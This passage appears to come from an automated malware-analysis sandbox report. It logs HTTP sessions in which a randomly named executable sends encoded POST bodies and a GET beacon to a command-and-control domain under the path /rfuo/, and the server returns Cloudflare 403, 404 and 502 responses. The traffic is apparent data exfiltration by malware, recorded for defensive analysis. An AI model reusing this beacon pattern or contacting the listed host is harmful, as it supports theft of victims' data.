                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:21.046061993 CEST949INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:21 GMT
                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTOrbkQajhkEIZe8L0fq7TYb7oiBLEAKXHop%2BJGmuUO8lrEt5qCs2FlvzCCBr3d40gs%2Fi0UMa0ki8HcGDjZ5oxRUEkx83toLdzqYCxCThQihTD%2F12zVr0qQsRNqIcagvui4MTxEYyZ0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73428a284372ab-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32
                                                                                                                                                                                                                        Data Ascii: error code: 502


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        45192.168.11.2049837104.21.64.124805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.271603107 CEST820OUTPOST /rfuo/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.gokulmohan.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.gokulmohan.online/rfuo/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4b 76 46 75 35 57 50 4a 52 70 67 75 67 37 74 76 55 5a 65 6e 55 75 50 44 4f 68 5a 66 59 33 57 6f 6b 67 65 44 7a 6c 41 41 50 58 42 39 73 62 2f 59 35 30 4f 47 67 4c 33 79 49 45 6b 6d 58 76 50 38 4c 75 45 37 75 49 4f 56 63 5a 64 47 49 33 7a 49 50 39 51 65 6c 32 68 48 39 31 4d 62 53 70 62 54 4f 33 4c 34 41 43 53 73 72 44 4b 6a 7a 4f 69 37 79 69 52 6a 4b 57 63 42 67 6c 44 59 70 5a 62 6a 56 7a 58 64 46 51 64 72 76 67 62 2b 55 35 46 6e 67 51 50 35 37 4a 63 39 65 45 70 34 4f 5a 73 61 73 68 35 56 6a 4e 72 37 46 56 4b 57 2b 41 34 34 71 55 6b 49 6b 39 57 6c 56 6f 4b 57 78 4f 58 4a 54 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=KvFu5WPJRpgug7tvUZenUuPDOhZfY3WokgeDzlAAPXB9sb/Y50OGgL3yIEkmXvP8LuE7uIOVcZdGI3zIP9Qel2hH91MbSpbTO3L4ACSsrDKjzOi7yiRjKWcBglDYpZbjVzXdFQdrvgb+U5FngQP57Jc9eEp4OZsash5VjNr7FVKW+A44qUkIk9WlVoKWxOXJTA==
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821609020 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:26 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XVKLD69Hnyy%2BdZ7o1AFUVnaVUCHjQy1SxSeZsk5%2F50Lk6bY9tMRMOL6CEJM8cmf%2BY5CQeGhezmipc6d6Y5fS02CDWSTn%2Fhc9RmLY%2FWF1oqAMpzqGR2fbeyQacGIbLCDJ%2BT2YFDeV%2Bt4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342ac88594314-EWR
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,Z-Itf~ZI8Ratink
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821675062 CEST1087INData Raw: b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74 1a 6e 87 e2 c2 2c 79 86 0d ec 80 88 36 ed 04 0e 7c d7 34 c2 6d a0 fd 5e ce 29 d9 36 94 7d 6b 3d 18 ed 1d 0b 07 65 59 6c 4d f0 a6 d5 c2 08
                                                                                                                                                                                                                        Data Ascii: V/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!BtW9 WX{5]("RZ7Q~p)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.821682930 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        46192.168.11.2049838104.21.64.124805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:28.903660059 CEST840OUTPOST /rfuo/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.gokulmohan.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.gokulmohan.online/rfuo/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4b 76 46 75 35 57 50 4a 52 70 67 75 69 62 39 76 59 65 4b 6e 46 2b 50 43 42 42 5a 66 57 58 57 73 6b 6e 57 44 7a 6b 56 62 50 46 6c 39 76 2f 37 59 34 31 4f 47 70 62 33 79 41 6b 6b 5a 5a 50 50 4e 4c 75 4a 52 75 4e 75 56 63 5a 68 47 49 7a 6a 49 50 4f 6f 66 6b 6d 68 5a 6a 56 4d 5a 4e 5a 62 54 4f 33 4c 34 41 43 47 57 72 44 43 6a 7a 2f 79 37 7a 47 46 67 56 6d 63 4f 6f 46 44 59 74 5a 62 5a 56 7a 57 4b 46 53 70 42 76 6a 7a 2b 55 37 74 6e 68 42 50 32 31 4a 63 2f 61 45 70 71 44 72 4e 6f 76 6a 42 34 73 65 37 37 61 6b 58 69 2f 57 31 69 33 6d 51 73 6e 75 4b 58 52 59 7a 2b 7a 4d 57 53 4f 44 73 73 61 44 52 30 33 75 55 66 37 7a 4a 62 48 70 52 56 62 54 41 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=KvFu5WPJRpguib9vYeKnF+PCBBZfWXWsknWDzkVbPFl9v/7Y41OGpb3yAkkZZPPNLuJRuNuVcZhGIzjIPOofkmhZjVMZNZbTO3L4ACGWrDCjz/y7zGFgVmcOoFDYtZbZVzWKFSpBvjz+U7tnhBP21Jc/aEpqDrNovjB4se77akXi/W1i3mQsnuKXRYz+zMWSODssaDR03uUf7zJbHpRVbTA=
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477283955 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:29 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eiVmhfPeYp1S7Ho30%2BJwqzBfwRuAQvSoMWOfrMHRV8rTfCaiYrc7ViKBM8xQUTH1s3btQNS1DDF25nzL%2BZO%2BIuUyey%2F%2BpS2pvectLPiAT48uw0ptVfSfSuMD1Pfyuf08iWFw73QDnlw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342bcfab64338-EWR
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94602&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,Z-Itf~ZI8RatinkV
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477375031 CEST1072INData Raw: c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74 1a 6e 87 e2 c2 2c 79 86 0d ec 80 88 36 ed 04 0e 7c d7 34 c2 6d a0 fd 5e ce 29 d9 36 94 7d 6b 3d 18 ed 1d 0b 07 65 59 6c 4d f0 a6 d5 c2 08 52 d6 3c 40
                                                                                                                                                                                                                        Data Ascii: /8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!BtW9 WX{5]("RZ7Q~p)C
                                                                                                                                                                                                                        Oct 23, 2024 18:56:29.477386951 CEST21INData Raw: 62 0d 0a e3 02 00 6a 20 10 e1 35 0b 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: bj 50


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        47192.168.11.2049839104.21.64.124805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.527971029 CEST1289OUTPOST /rfuo/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.gokulmohan.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.gokulmohan.online/rfuo/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4b 76 46 75 35 57 50 4a 52 70 67 75 69 62 39 76 59 65 4b 6e 46 2b 50 43 42 42 5a 66 57 58 57 73 6b 6e 57 44 7a 6b 56 62 50 46 74 39 76 4b 76 59 35 57 6d 47 37 4c 33 79 4f 45 6b 69 5a 50 50 55 4c 75 42 56 75 4e 69 76 63 66 74 47 4f 6b 4c 49 4a 2f 6f 66 71 6d 68 5a 35 31 4d 63 53 70 62 43 4f 30 7a 38 41 43 57 57 72 44 43 6a 7a 38 61 37 36 79 52 67 4f 6d 63 42 67 6c 43 5a 70 5a 61 32 56 7a 76 2f 46 53 74 37 76 54 54 2b 55 62 39 6e 6e 33 54 32 35 4a 63 35 64 45 6f 35 44 72 42 7a 76 6a 4e 30 73 61 7a 56 61 6d 33 69 38 54 6f 4e 75 6c 41 4a 37 50 32 37 51 61 2b 46 2f 74 53 6c 4d 41 6f 4b 56 6c 59 63 77 35 38 51 78 46 56 42 64 4c 51 57 4a 6c 33 61 43 57 7a 33 2f 62 65 48 77 34 34 62 32 4f 55 45 37 32 2b 48 6f 37 76 30 46 59 32 63 78 77 34 50 54 47 77 34 66 64 71 72 46 35 38 67 4d 61 39 66 47 38 63 30 63 35 76 78 46 72 4a 58 69 57 45 57 36 53 59 52 63 63 33 46 32 53 52 48 30 61 62 4c 31 71 6d 69 79 53 31 67 48 67 4d 58 70 44 57 53 46 77 38 63 4c 34 44 58 2b 31 4b 41 76 4a 71 5a 4b 72 70 48 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=KvFu5WPJRpguib9vYeKnF+PCBBZfWXWsknWDzkVbPFt9vKvY5WmG7L3yOEkiZPPULuBVuNivcftGOkLIJ/ofqmhZ51McSpbCO0z8ACWWrDCjz8a76yRgOmcBglCZpZa2Vzv/FSt7vTT+Ub9nn3T25Jc5dEo5DrBzvjN0sazVam3i8ToNulAJ7P27Qa+F/tSlMAoKVlYcw58QxFVBdLQWJl3aCWz3/beHw44b2OUE72+Ho7v0FY2cxw4PTGw4fdqrF58gMa9fG8c0c5vxFrJXiWEW6SYRcc3F2SRH0abL1qmiyS1gHgMXpDWSFw8cL4DX+1KAvJqZKrpH3/8wQeQoYYNpNN8VUboCwR4nt7v9Tt6obfnJIaBaUwL79LKr3XX14vTJkDMQDUqPeriz2wnjqEXGVbw3iu1J0SHX0bgDciJqFXBbOhMfFJsDERzQiz+gAwacpTraEzXRFT8X6QVK97bEB5UTrY/+n0VyrYLflOQHHwIEtaVNNLIdphdJ9fegUV8NqiXg/bQIKPKxAdSgoJNkN1aIVu2a/Ek9h0SSNFi7HxE8JnbWbN9dD8AEGteHTRFVp+Mv9nwelzx2wxP4xosxgz4y+AQYs7qcn6RVjZytWL7rWcmeGHhEkBQ9O/L2BHVujQe9P6t4KDe5laMCnldZ
                                                                                                                                                                                                                        Oct 23, 2024 18:56:31.528033018 CEST6700OUTData Raw: 70 32 46 55 37 56 4b 55 32 61 37 47 58 48 51 54 50 79 76 61 78 5a 4e 4e 2f 7a 6e 68 4a 47 6e 48 57 43 68 43 61 32 44 6d 46 39 7a 4c 33 77 44 47 69 37 52 52 66 6d 44 2f 51 34 4c 77 75 33 6e 72 78 31 51 69 34 4c 45 33 4a 78 56 36 32 78 36 57 45 48
                                                                                                                                                                                                                        Data Ascii: p2FU7VKU2a7GXHQTPyvaxZNN/znhJGnHWChCa2DmF9zL3wDGi7RRfmD/Q4Lwu3nrx1Qi4LE3JxV62x6WEHqTcz61f4Hx5/bWQI58t/aKaENhDvXQgKo9ptrCDDHEfw8Fqp0I+G7K2munmAi83qmTFTqkq24Do2ADLYe9E/SF/9VA0+qFUA80BDaoqr2bl1G0BMKSnhmthoINmVc2TRgih0s0S4nHrtezwpyltQ737ZR0biQqL9u
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102612972 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:32 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOO3Xz7s0rOdztK0PpduxCIKD0KT1fF6nhIQHP5HjXUVae93kNcLcDhxFGpGgMI9Q1w25%2Fw4gVSUl85a73xVW9oaegZW4UbPMYRzwXMR8bpcxGOdQ5l7jYKrg2CPFqgclVAZnrEDuUg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7342cd5df1726b-EWR
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94252&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7989&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,Z-Itf~ZI8RatinkV/8?
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102679968 CEST1065INData Raw: 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74 1a 6e 87 e2 c2 2c 79 86 0d ec 80 88 36 ed 04 0e 7c d7 34 c2 6d a0 fd 5e ce 29 d9 36 94 7d 6b 3d 18 ed 1d 0b 07 65 59 6c 4d f0 a6 d5 c2 08 52 d6 3c 40 17 2a bd 5f 4c 60 4e
                                                                                                                                                                                                                        Data Ascii: =9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC!BtW9 WX{5]("RZ7Q~p)C h|
                                                                                                                                                                                                                        Oct 23, 2024 18:56:32.102724075 CEST21INData Raw: 62 0d 0a e3 02 00 6a 20 10 e1 35 0b 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: bj 50


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        48192.168.11.2049840104.21.64.124805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.151449919 CEST539OUTGET /rfuo/?Hh=g6BlO&2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj67/9n3YrtONKlQmdJDOXt5dm9a5cNA5akyMA8hzjxd/lkJNPaGIP3HcLzqJj36WiuTl2EhOSjI= HTTP/1.1
                                                                                                                                                                                                                        Host: www.gokulmohan.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:34.711076021 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:34 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTmoVit02TFPilnQKTr2EByKt%2B1zJLpLTJDBT541C%2BgYrd1DHfxQ67%2F%2BIdgSzSMvjXBSXfRmD%2BCOM3lbgWuvhOshphDRlGDLfZaFs8ZonY0xaW36udXnGqsoK1vQu%2BXjskTSrGk5Gs0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
